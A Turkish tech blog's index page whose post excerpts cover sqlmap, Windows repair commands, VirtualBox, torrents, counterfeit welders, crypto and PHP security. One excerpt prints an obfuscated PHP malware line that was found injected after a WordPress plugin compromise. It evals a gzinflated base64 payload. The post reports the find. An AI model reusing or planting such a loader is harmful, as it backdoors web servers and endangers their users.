sqlmap, veritabanı kullanan web uygulamalarındaki güvenlik açıklarını bulmaya çalışan yetenekli bir araçtır. sqlmap hatalı kodlanan SQL cümlelerini suilstimal (exploit) etmeye çalışarak güvenlik açıklarını tespit eder. sqlmap açık kaynak kodlu bir araçtır (tüm yetenekler için tıklayın). Araç, verilen URL üzerinde birçok türde SQL zafiyetini araştırarak veritabanı ve çalıştığı sistemi ele geçirmeye çalışır. Özetle güvenlik hassasiyeti dikkate alınmadan kodlanmış veya yapılandırılmış veritabanı sistemi kullanan uygulamalarda açık arayarak sistemi ele geçermenin yolunu bulmaya çalışır. Suistimal edebileceği bir enjeksiyon noktası bulduğunda veritabanı ve sunucu üzerindeki verilere erişmeyi dener. Bunlar kullanıcı bilgilerinin veya mesajlaşma kayıtlarının tutulduğu tablolar, kredi kartı ve diğer finansal bilgilerin tutulduğu hassas tablolar ve sunucunun dosya sisteminde kayıtlı diğer dosyalar olabilir.
Okumaya devam et “SQLMap ve SQLi (SQL Injection)”İlkokul Avrupa Ülkeleri Okuma Etkinliği Boyama Haritası
Kızımın sınıfı için hazırladığım avrupa ülkeleri okuma etkinliği boyama haritası. Kitap okudukça listeye adını yazıyor ve sıradaki ülkeyi haritadan bulup boyuyor. Böyle etkinlikler bazı çocukların hoşuna gidiyor. Benim ki de onlardan biri. Etkinlik dosyasını aşağıdaki bağlantıdan indirerek çıktı alabilirsiniz.
avrupa-ulkeler-okuma-etkinlik.pdf (6923 downloads )Virtualbox (Virtual Machine) Ağ Ayarları
Virtualbox sanal makinesine konuk bilgisayarın kullanımı için sanal ağ arabirimleri eklenebildiği gibi Network Manager penceresinden yeni sanal switch’ler de eklenebilir. Sanal switch’ler ile sanal makineler arasında bir ağ kurulabilir. Bu ağdan dışarı kapatılabilir, dışarı port yönlendirme ve NAT yapılabilir. VirtulaBox’ın kendi DHCP sunucusu ile IP yapılandırması dağıtılabilir.
Okumaya devam et “Virtualbox (Virtual Machine) Ağ Ayarları”Windows Tamir Araçları
Windows garip hatalar vermeye ve düzgün çalışmamaya başladığında sorunun kaynağı dosya sistemi olabilir. Bu yazıda her teknisyenin bilmesi gereken, dosya sistemi hatalarını teşhis ve tamir için kullanabileceğiniz araçlardan bahsedeceğim.
|
1 2 3 4 |
chkdsk c: /f /x /r sfc /scannow dism /online /cleanup-image /scanhealth dism /online /cleanup-image /restorehealth |
Torrent Arama için En İyi Yöntem
Daha önce blog’da torrent arama için birkaç yazı yazmıştım ve arada güncelliyordum. Artık tüm bu uğraştırıcı ve vakit alıcı yöntemlerin yerine, kullandığım yeni programı tanıtmak istiyorum. Programın adı qBitTorrent ve sık tercih edilen torrent istemcilerden biri. Ancak qBittorent’ı diğerlerinden ayıran en önemli özelliği eklentileri sayesinde 40’dan fazla public tracker’da arama yapabilmesi. Bu özelliği kullanabilmek için aşağıdakileri gerçekleştirmeniz yeterli.
Okumaya devam et “Torrent Arama için En İyi Yöntem”Windows’un Açılış Kapanış Tarihlerini Öğrenmek
Tüm işletim sistemlerinin sistem olaylarını kayıt altına almak için dahili mekanizmaları vardır. Bu kayıtlar sistemin ve programların çalışma durumları ve yol açtıkları hatalar hakkında geriye dönük olarak bilgi depolarlar. Bu başlıkta Windows’un olay kaydedicisinin kaydettiği sistemin kapanış/açılış/uyuma gibi zamanlarını nasıl öğrenebileceğimize değineceğim. Windows her olay türünü tekil bir ID (kimlik) numarası ile işaretler. Konumuz sistemin açılış/kapanış (shutdown/turn-on) zamanları olduğu için aşağıdaki ID’lere odaklanacağız ve kayıtları görmek için komut istemcisini kullanacağız (cmd.exe)
Okumaya devam et “Windows’un Açılış Kapanış Tarihlerini Öğrenmek”Tillson T3 İndikatörünü PHP ile Yazalım
Tillson T3 indikatörü, T3, Tillson hareketli ortalamaları olarak da bilinir. Bu teknik göstergenin geliştirilmesinin ardındaki düşünce hareketli ortalamalarda bulunabilecek gecikme ve yanlış sinyalleri iyileştirmekti. T3, diğer ortalama alan (SMA, EMA vb) trend indikatörlerine göre daha yumuşak (daha pürüzsüz) ve duyarlı sonuçlar üretir. T3 kullanılarak trend dönüşleri hissedilebilir.
Okumaya devam et “Tillson T3 İndikatörünü PHP ile Yazalım”Dikkat: Sahte İnvertör Kaynak Makineleri – 2
Daha önce burada sahte bir invertör kaynak makinesini incelemiştim. Şimdi de bunun yerine aldığım farklı bir invertör makinesinin inceliyorum. Bu cihazın markası ve modeli Mailtank MMA-400. Belirgin ayırt edici özelliği fiziksel boyutlarının çok ufak olması ve kendi taşıma çantası ile beraber gelmesi. Dış görünüşüne ait fotografı aşağıda görebileceğiniz invertör kaynak makinesi farklı marka ve model isimleri ile de satılıyor. Cihaz aynı cihaz.
Okumaya devam et “Dikkat: Sahte İnvertör Kaynak Makineleri – 2”Youtube oynatma listesindeki tüm videoları bilgisayara indirin
Bir oynatma listesinde yer alan tüm video’ları indirmek için aşağıdaki adımları uygulayabilirsiniz.
- Bilgisayarınıza youtube-dl aracını indirin. Bu araç açık kaynak kodludur ve ücretsizdir. Komut satırında çalışır. Tüm işletim sistemleri için sürümü vardır. İşletim sisteminize uygun sürümü indirdiğinizden emin olun. Windows için indiriyorsanız, indirme sayfasında belirtilen ilgili servis paketinin sisteminizde yüklü olduğunu teyit edin.
- Windows+R tuş bileşimini kullanarak Çalıştır diyalog penceresini açın ve cmd yazarak komut istemcisini çalıştırın.
- Komut istemcisinde cd <dizin adı> komutunu kullanarak youtube-dl.exe dosyasının bulunduğu dizine gidin.
- İndirme istediğiniz oynatma listesinin adresini (URL) kopyalayın ve aşağıdaki gibi youtube-dl aracına parametre olarak verin.:
Saldırı Senaryoları
Herkese Merhaba,
Münkün olan bazı saldırı yöntemleri ve bunlara karşı kendinizi nasıl koruyacağınız hakkında kısa açıklamalardan oluşan küçük bir liste oluşturdum. Yazıda son birkaç yılda tespit ettiğim bu bilgilerin anlaşılmasını sağlamaya çalışacağım. Şunu belirtmek isterim ki yazımda diğer bilgisayarlara saldırı düzenleme düşüncesi yoktur, zaten bu konu hakkında da çok fazla deneyime sahip değilim. Umuyorum ki okuyacağınız bu yazı bilgisayar saldırıları konusunda daha duyarlı olmanızı sağlayacaktır.
Okumaya devam et “Saldırı Senaryoları”Dikkat: Sahte İnvertör Kaynak Makineleri
Geçen ay hepsiburada’dan bir invertör kaynak makinesi aldım. Burada satın aldığım makineyi görebilirsiniz. Insma adlı çinli satıcının dükkanında olan bu ürün kargo ve vergiler dahil yaklaşık 900TL’ye satılıyor. Malesef gelen ürün fabrikasyon şekilde (bilinçli olarak) üretilmiş bazı sahtelikler ve aldatmacalar barındırıyordu. Bir invertör kartı (PCB) sahte olarak nasıl üretilebilir aşağıda açıklamaya çalıştım. Bu bilgileri hepsiburada ile de paylaştım ürünü iade aldılar fakat ürünü satmaya devam ediyorlar. Bu açıkça Türk halkını kandırmaya yönelik, açıkça sahte olarak üretilmiş bir ürünü satmaya devam etmek suç olsa gerek ama duyarsız kaldılar. Er ya da geç bu ürünü kaldıracaklar, bundan eminim. Bu yazıyı yazmaktaki maksadım bu tarz ürünler konusunda tüketicileri bilgilendirmek.
Okumaya devam et “Dikkat: Sahte İnvertör Kaynak Makineleri”İlginç bir PHP arka kapısı
Birkaç yıl önce Genius‘un sayesinde haberdar olduğum aşağıdaki kod hala daha (v7.2.x) çalışmakta. İlginç yanı short_tags etkin olmasa dahi çalışıyor. Daha ilginci ve hakkkında pek bilgi bulamadığım kısmı ise dinamik olarak yaratılan ve veri (data) olarak ele alınması gereken bir yapının PHP tarafından bir metod (function) olarak değerlendirilmesi ve çalıştırılması.
Okumaya devam et “İlginç bir PHP arka kapısı”Zararlı bir PHP kodu (PHP Malware)
Eski bir wordpress plug’innin neden olduğu sızmada aşağıdaki kod php betiklerinin başına eklenmiş.
|
1 |
<? $oO0="cr"."eat"."e_fun"."cti"."on";$o0O=@$oO0('$x','ev'.'al'.'("?>".gz'.'inf'.'late'.'( bas'.'e64'.'_de'.'co'.'de($x)));');@$o0O("s7EvyCjg5cpM0yguKSrIL9ZQiQ92DQpzDYpW9wgJCYgPBfLiHd1d/ULUY3WU8vPTc1KT8kuUNDWrebk4M1ITU1KLNJRAKvUN9QwVjA0MFXzzy1JTFAJSi3IT81LzSnIqlTStkdT65CcnlmTm51kpZJSUFBRb6euXl5frpSUmp+YmFmcb5+ZZmuol5+cCNaVkpgI11vJy2dsBAA=="); |
Kripto Notlarım
Bu sayfayı sürekli güncelleyeceğim kılavuz niteliğindeki notlar için ayırdım. Kendime notlar.
Okumaya devam et “Kripto Notlarım”Pi Coin: Geleceğin Kripto Parası
Kripto paralar dominant para birimi olan BitCoin’in $20.000’a ulaşması ile daha çok konuşulacağa benziyor. Bu yükseliş çok volatileli olsa da genel trendin son 10 yıldır yukarı doğru olduğunu görmek için finans uzmanı olmaya gerek yok. Çoğu kişinin kripto paralar ile tanışmadığını düşünürsek; kripto paraların bilinirliği arttıkça bu trend çizgisi artan bir ivme ile yükselmeye devam edecek gibi gözüküyor. Şuan oldukça sınırlı bir kitle tarafından kullanılan ve bilinen kripto paraların geleceği oldukça parlak. Buradan kripto paraların aylara ve yıllara göre değişimini görebilir piyasa hacimlerine göz atabilirsiniz. 2020 itibari ile 1 tirilyon dolara yaklaşan bir hacim söz konusu.
Okumaya devam et “Pi Coin: Geleceğin Kripto Parası”PCB’de YOL KALINLIKLARI VE CLERANCE DEĞERLERİ
PCB çizimine yeni başlayan herkesin aklına gelebilen bazı sorular vardır. En önemlilerinden biri de iletken yolu (Trace) çizimidir.
Peki iletken yolu (Trace) çizerken kullanması gereken kalınlıklar ve diğer iletkenler ile arasında olması gereken minimum boşluk (Clearance) ne olmalı?
